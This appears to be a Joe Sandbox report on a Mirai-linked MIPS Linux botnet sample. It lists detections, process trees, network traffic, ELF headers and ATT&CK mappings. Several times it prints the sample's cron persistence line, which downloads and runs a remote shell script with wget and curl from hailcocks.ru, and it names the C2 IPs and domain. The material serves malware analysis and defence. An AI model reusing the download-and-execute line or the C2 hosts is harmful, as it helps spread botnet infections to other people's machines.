Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshkmips.elf

Overview

General Information

Sample name:nshkmips.elf
Analysis ID:1577030
MD5:296314df0b5078410e293db42ef8dc51
SHA1:55ec777021fa776446a47eba09d686b21c12825a
SHA256:727866578de01bce8d81762adff405eae9afac8ceeea81deb92955d982be421d
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1577030
Start date and time:2024-12-17 21:42:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshkmips.elf
Detection:MAL
Classification:mal68.troj.linELF@0/1@17/0
  • VT rate limit hit for: nshkmips.elf
Command:/tmp/nshkmips.elf
PID:6208
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • dash New Fork (PID: 6188, Parent: 4331)
  • rm (PID: 6188, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG
  • dash New Fork (PID: 6189, Parent: 4331)
  • rm (PID: 6189, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGG
  • nshkmips.elf (PID: 6208, Parent: 6124, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/nshkmips.elf
    • sh (PID: 6210, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6216, Parent: 6210)
        • sh New Fork (PID: 6218, Parent: 6216)
        • crontab (PID: 6218, Parent: 6216, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6217, Parent: 6210)
      • crontab (PID: 6217, Parent: 6210, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshkmips.elfAvira: detected
Source: nshkmips.elfReversingLabs: Detection: 21%
Source: tmp.yuaIDk.22.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 80.78.26.121 ports 9421,18670,5169,9153,1,3,5,9
Source: global trafficTCP traffic: 212.64.215.71 ports 4067,3243,1,4,5,6,15466,13743
Source: global trafficTCP traffic: 192.168.2.23:57590 -> 80.78.26.121:9153
Source: global trafficTCP traffic: 192.168.2.23:43534 -> 212.64.215.71:15466
Source: /tmp/nshkmips.elf (PID: 6208)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.yuaIDk.22.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal68.troj.linELF@0/1@17/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6218)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6217)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6217)File: /var/spool/cron/crontabs/tmp.yuaIDkJump to behavior
Source: /usr/bin/crontab (PID: 6217)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshkmips.elf (PID: 6210)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: /usr/bin/dash (PID: 6188)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGGJump to behavior
Source: /usr/bin/dash (PID: 6189)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.24FY65F9IU /tmp/tmp.dFfaOL50Ud /tmp/tmp.PCCj74KoGGJump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nshkmips.elf (PID: 6208)Queries kernel information via 'uname': Jump to behavior
Source: nshkmips.elf, 6208.1.000055dc5d7ce000.000055dc5d877000.rw-.sdmp, nshkmips.elf, 6219.1.000055dc5d7ce000.000055dc5d877000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
Source: nshkmips.elf, 6208.1.000055dc5d7ce000.000055dc5d877000.rw-.sdmp, nshkmips.elf, 6219.1.000055dc5d7ce000.000055dc5d877000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
Source: nshkmips.elf, 6208.1.00007fff08e71000.00007fff08e92000.rw-.sdmp, nshkmips.elf, 6219.1.00007fff08e71000.00007fff08e92000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/nshkmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshkmips.elf
Source: nshkmips.elf, 6208.1.00007fff08e71000.00007fff08e92000.rw-.sdmp, nshkmips.elf, 6219.1.00007fff08e71000.00007fff08e92000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
1
File Deletion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577030 Sample: nshkmips.elf Startdate: 17/12/2024 Architecture: LINUX Score: 68 32 80.78.26.121, 18670, 45406, 45408 CYBERDYNELR Cyprus 2->32 34 kingstonwikkerink.dyn 212.64.215.71, 13743, 15466, 3243 RACKSPACE-LONGB Turkey 2->34 36 3 other IPs or domains 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 dash rm nshkmips.elf 2->9         started        11 dash rm 2->11         started        signatures3 process4 process5 13 nshkmips.elf sh 9->13         started        15 nshkmips.elf 9->15         started        17 nshkmips.elf 9->17         started        process6 19 sh crontab 13->19         started        23 sh 13->23         started        25 nshkmips.elf 15->25         started        file7 30 /var/spool/cron/crontabs/tmp.yuaIDk, ASCII 19->30 dropped 44 Sample tries to persist itself using cron 19->44 46 Executes the "crontab" command typically for achieving persistence 19->46 27 sh crontab 23->27         started        signatures8 process9 signatures10 48 Executes the "crontab" command typically for achieving persistence 27->48

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
nshkmips.elf21%ReversingLabsLinux.Backdoor.Mirai
nshkmips.elf100%AviraEXP/ELF.Agent.J.8
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
212.64.215.71
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.yuaIDk.22.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      80.78.26.121
      unknownCyprus
      37560CYBERDYNELRtrue
      212.64.215.71
      kingstonwikkerink.dynTurkey
      15395RACKSPACE-LONGBfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      80.78.26.121nshkarm7.elfGet hashmaliciousUnknownBrowse
        nshkarm5.elfGet hashmaliciousUnknownBrowse
          nshkarm.elfGet hashmaliciousUnknownBrowse
            212.64.215.71nshkarm7.elfGet hashmaliciousUnknownBrowse
              nshkarm5.elfGet hashmaliciousUnknownBrowse
                nshkarm.elfGet hashmaliciousUnknownBrowse
                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                  91.189.91.43la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                    la.bot.mips.elfGet hashmaliciousMiraiBrowse
                      cmc.elfGet hashmaliciousUnknownBrowse
                        la.bot.arc.elfGet hashmaliciousMiraiBrowse
                          la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                            la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                  la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                    la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                      91.189.91.42la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                        la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                          cmc.elfGet hashmaliciousUnknownBrowse
                                            la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                              la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                  la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                    la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                      la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                        la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          kingstonwikkerink.dynnshkarm7.elfGet hashmaliciousUnknownBrowse
                                                          • 80.78.26.121
                                                          nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                          • 80.78.26.121
                                                          nshkarm.elfGet hashmaliciousUnknownBrowse
                                                          • 80.78.26.121
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CANONICAL-ASGBla.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          cmc.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                          • 185.125.190.26
                                                          la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          CANONICAL-ASGBla.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          cmc.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                          • 185.125.190.26
                                                          la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          RACKSPACE-LONGBnshkarm7.elfGet hashmaliciousUnknownBrowse
                                                          • 212.64.215.71
                                                          nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                          • 212.64.215.71
                                                          nshkarm.elfGet hashmaliciousUnknownBrowse
                                                          • 212.64.215.71
                                                          i686.elfGet hashmaliciousMiraiBrowse
                                                          • 92.52.99.131
                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 89.234.28.7
                                                          Josho.arm.elfGet hashmaliciousUnknownBrowse
                                                          • 89.234.45.46
                                                          https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                                          • 134.213.193.62
                                                          meerkat.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 134.213.250.148
                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 162.13.153.221
                                                          teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                          • 92.52.99.126
                                                          CYBERDYNELRnshkarm7.elfGet hashmaliciousUnknownBrowse
                                                          • 80.78.26.121
                                                          nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                          • 80.78.26.121
                                                          nshkarm.elfGet hashmaliciousUnknownBrowse
                                                          • 80.78.26.121
                                                          GjNVpV53SR.exeGet hashmaliciousQuasarBrowse
                                                          • 80.78.28.83
                                                          p-p.c-440.DUSK.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 185.193.127.129
                                                          PhysXCooking64.dll.dllGet hashmaliciousBazar LoaderBrowse
                                                          • 80.78.24.30
                                                          FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                          • 80.78.24.30
                                                          PhysXCooking64.dll.dllGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                          • 80.78.24.30
                                                          na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 185.193.127.129
                                                          na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 185.193.127.129
                                                          INIT7CHla.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          cmc.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          No context
                                                          No context
                                                          Process:/usr/bin/crontab
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):306
                                                          Entropy (8bit):5.140730820656145
                                                          Encrypted:false
                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvmUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8S8eHLUHYC+GABjnOGAFkz
                                                          MD5:B1713A8BCF78C93DC490E0B1D4720C37
                                                          SHA1:9522C497950637D4D4A1235462B40E395FAEAF22
                                                          SHA-256:5D415CF59C3A287D952E7480A2801A393B2C98ECD7BF3D62CD61CDBE0FC0AADD
                                                          SHA-512:78C284FEC0FACF634BC82FE94466A091737541ECA7313D2DB92E4FD60866E0C63FBEDC66F1C6457B7594595FE42C41E0B6ADD3CC199346CF15477FF3BDD7736C
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 17 14:42:44 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                          File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                          Entropy (8bit):5.516087912436742
                                                          TrID:
                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                          File name:nshkmips.elf
                                                          File size:97'508 bytes
                                                          MD5:296314df0b5078410e293db42ef8dc51
                                                          SHA1:55ec777021fa776446a47eba09d686b21c12825a
                                                          SHA256:727866578de01bce8d81762adff405eae9afac8ceeea81deb92955d982be421d
                                                          SHA512:06cf37a549e24bc873e22572bbb40c10516b01275849e4091eb5bb8d829fd5752b85d1541abbb2261c6db2d83b6b642f4323498ac68ccc7c6a7ebab0cb2c6dee
                                                          SSDEEP:1536:jZHf/la6kfjZCKPxIf4XhSlSfa5eu5e+Oe9MGSKmtsgrRrefPvgEA9rBEk:NE/C/SfuSKmtttMILrBEk
                                                          TLSH:6F93B81E6E218FBDF768C33447B78A21A35937D223E1D685D26CD2105F6028E585FFA8
                                                          File Content Preview:.ELF.....................@.`...4..z......4. ...(.............@...@....m...m...............p..Ep..Ep....P..[.........dt.Q............................<...'..\...!'.......................<...'..8...!... ....'9... ......................<...'......!........'9Q

                                                          ELF header

                                                          Class:ELF32
                                                          Data:2's complement, big endian
                                                          Version:1 (current)
                                                          Machine:MIPS R3000
                                                          Version Number:0x1
                                                          Type:EXEC (Executable file)
                                                          OS/ABI:UNIX - System V
                                                          ABI Version:0
                                                          Entry Point Address:0x400260
                                                          Flags:0x1007
                                                          ELF Header Size:52
                                                          Program Header Offset:52
                                                          Program Header Size:32
                                                          Number of Program Headers:3
                                                          Section Header Offset:96948
                                                          Section Header Size:40
                                                          Number of Section Headers:14
                                                          Header String Table Index:13
                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                          NULL0x00x00x00x00x0000
                                                          .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                          .textPROGBITS0x4001200x1200x151300x00x6AX0016
                                                          .finiPROGBITS0x4152500x152500x5c0x00x6AX004
                                                          .rodataPROGBITS0x4152b00x152b00x1b400x00x2A0016
                                                          .ctorsPROGBITS0x4570000x170000x80x00x3WA004
                                                          .dtorsPROGBITS0x4570080x170080x80x00x3WA004
                                                          .data.rel.roPROGBITS0x4570140x170140x100x00x3WA004
                                                          .dataPROGBITS0x4570300x170300x3c80x00x3WA0016
                                                          .gotPROGBITS0x4574000x174000x6500x40x10000003WAp0016
                                                          .sbssNOBITS0x457a500x17a500x2c0x00x10000003WAp004
                                                          .bssNOBITS0x457a800x17a500x51480x00x3WA0016
                                                          .mdebug.abi32PROGBITS0xcde0x17a500x00x00x0001
                                                          .shstrtabSTRTAB0x00x17a500x640x00x0001
                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                          LOAD0x00x4000000x4000000x16df00x16df05.56850x5R E0x10000.init .text .fini .rodata
                                                          LOAD0x170000x4570000x4570000xa500x5bc83.71250x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 17, 2024 21:42:44.393347025 CET43928443192.168.2.2391.189.91.42
                                                          Dec 17, 2024 21:42:45.268177986 CET575909153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:45.382745981 CET575929153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:45.387842894 CET91535759080.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:45.387929916 CET575909153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:45.388185024 CET575909153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:45.502451897 CET91535759280.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:45.502705097 CET575929153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:45.502985001 CET575929153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:45.507651091 CET91535759080.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:45.507831097 CET575909153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:45.838778973 CET91535759280.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:45.838810921 CET91535759080.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:45.839204073 CET575929153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:45.958986044 CET91535759280.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:47.063010931 CET91535759280.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:47.063268900 CET575929153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:47.063436985 CET575929153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:50.024578094 CET42836443192.168.2.2391.189.91.43
                                                          Dec 17, 2024 21:42:51.560338974 CET4251680192.168.2.23109.202.202.202
                                                          Dec 17, 2024 21:42:52.386653900 CET4353415466192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:42:52.506289959 CET1546643534212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:42:52.506483078 CET4353415466192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:42:52.506563902 CET4353415466192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:42:52.626228094 CET1546643534212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:42:52.626621008 CET4353415466192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:42:52.746418953 CET1546643534212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:42:54.844172001 CET1546643534212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:42:54.845128059 CET4353415466192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:42:54.965085030 CET1546643534212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:42:55.388900995 CET575909153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:42:55.508999109 CET91535759080.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:55.812562943 CET91535759080.78.26.121192.168.2.23
                                                          Dec 17, 2024 21:42:55.812851906 CET575909153192.168.2.2380.78.26.121
                                                          Dec 17, 2024 21:43:00.090342999 CET564104067192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:00.210127115 CET406756410212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:00.210226059 CET564104067192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:00.210274935 CET564104067192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:00.330074072 CET406756410212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:00.330296040 CET564104067192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:00.450124979 CET406756410212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:02.516232014 CET406756410212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:02.516827106 CET564104067192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:02.636936903 CET406756410212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:04.870582104 CET43928443192.168.2.2391.189.91.42
                                                          Dec 17, 2024 21:43:12.771760941 CET4446813743192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:12.891463995 CET1374344468212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:12.891699076 CET4446813743192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:12.891784906 CET4446813743192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:13.011647940 CET1374344468212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:13.011991024 CET4446813743192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:13.133620977 CET1374344468212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:15.203712940 CET1374344468212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:15.204220057 CET4446813743192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:15.324317932 CET1374344468212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:17.156886101 CET42836443192.168.2.2391.189.91.43
                                                          Dec 17, 2024 21:43:21.252156973 CET4251680192.168.2.23109.202.202.202
                                                          Dec 17, 2024 21:43:35.470153093 CET399023243192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:35.591859102 CET324339902212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:35.592128038 CET399023243192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:35.592329025 CET399023243192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:35.712074995 CET324339902212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:35.712397099 CET399023243192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:35.832220078 CET324339902212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:37.907303095 CET324339902212.64.215.71192.168.2.23
                                                          Dec 17, 2024 21:43:37.907634974 CET399023243192.168.2.23212.64.215.71
                                                          Dec 17, 2024 21:43:38.030082941 CET324339902212.64.215.71192.168.2.23
